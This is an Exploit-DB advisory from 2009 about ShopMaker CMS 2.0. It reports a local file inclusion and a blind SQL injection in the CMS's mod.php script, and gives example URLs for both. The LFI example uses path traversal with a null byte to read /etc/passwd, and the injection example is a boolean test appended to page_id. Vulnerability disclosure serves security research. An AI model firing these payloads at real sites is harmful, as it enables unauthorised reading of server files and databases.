ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion

EDB-ID:

9356

CVE:

N/A


Author:

PLATEN

Type:

webapps


Platform:

PHP

Date:

2009-08-04


  Shopmaker CMS (bSQL/LFI) Multiple Remote Vulnerabilities


==============================================================================

Software : Shopmaker Asp 
version  : version 2.0
Vendor   : http://www.shopmaker.dk/
Author   : Platen  * mail: platen.secure[at]gmail.com
web      : Blog = Www.platen.gigfa.com ~ Www.pentesters.IR
Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake and all members in Pentesters.ir
==============================================================================


[LFI]

http://127.1.1.7/mod.php?mod=[LFI]

--------------------------------------------------------------------------

[BLIND SQL INJECTION ]

http://127.0.0.1/mod.php?mod=userpage&menu=130105&page_id=[BLIND]


--------------------------------------------------------------------------

exp:

lfi  ~~~~~~>  http://www.xxx.com/mod.php?mod=../../../../../../../../../../etc/passwd%00
                          
--------------------------------------------------------------------------
exp:

BLND ~~~~~~>  http://www.xxx.com:80/mod.php?mod=userpage&menu=130105&page_id=145'+and+31337-31337=0+--+

# milw0rm.com [2009-08-04]